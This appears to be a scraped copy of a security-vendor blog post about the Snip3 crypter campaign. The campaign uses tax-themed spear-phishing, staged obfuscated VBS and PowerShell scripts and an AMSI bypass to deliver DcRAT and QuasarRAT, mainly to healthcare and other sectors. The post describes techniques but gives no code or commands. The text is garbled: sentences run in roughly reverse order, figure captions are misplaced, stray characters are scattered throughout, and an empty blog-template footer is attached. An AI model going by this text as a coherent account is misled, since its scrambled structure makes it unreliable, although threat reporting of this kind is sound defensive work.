The ongoing Snip3 campaign constitutes a complex and multifaceted attack, which uses a series of sophisticated evasion techniques and multiple obfuscated scripts. The many observed Snip3 crypter campaigns and their dates Here, the initial VBS payloads with the file-name “Releve Fiscal” (tax relief) were downloaded as an attachment via a phishing email with a subject line related to “tax statements” across 2022.įig 2. Industry verticals targeted by the latest Snip3 crypter campaign(s) Organizations across these sectors should remain vigilant and deploy advanced security measures to protect against Snip3 Crypter and other such threats.įig 1. Other targeted sectors include energy, manufacturing, materials, finance, retail, and technology. Healthcare emerged as the most targeted sector as shown in the graph below. ThreatLabz has observed multiple Snip3 campaigns in the Zscaler Cloud targeting a variety of industry verticals. User-agent changes are used to download the final stage and addition of version variable ($VER = ‘v0.2’) in the Stage-3 PS Script URLs are shortened using TinyURL to download the Stage-2 and Stage-3 PS script Infrastructure is shifted periodically to evade malicious domain-based detections The final Snip3 RAT loader is downloaded from the server along with the corresponding user-agent containing system informationĬommands are received from the download server to decide the flow of execution for delivering the final RAT payload ![]() ![]() In-memory stages are decrypted using hardcoded keys with custom decryption routines ![]() Malicious strings are fetched from database servers via ADODB connectionsĪMSI bypass is performed by forcing an error The following are the new techniques used in the Snip3 Crypter Infection chain: Snip3 Crypter operates with new TTPs to deliver remote access trojans like DcRAT and QuasarRAT to targets. Threat actors utilize spear phishing emails with subjects related to “tax statements” as a bait to lure the victims into execution of the multi-staged infection chain. ThreatLabz has recently identified use of the crypter with new TTPs deploying RAT families including DcRAT and QuasarRAT targeting victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing via spear phishing emails with subject lines related to “tax statements” in order to lure victims into execution.īelow are the takeaways from the team’s in-depth analysis of the Snip3 Crypter campaign and the corresponding infection chain, which showcases the observed changes in the TTPs.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |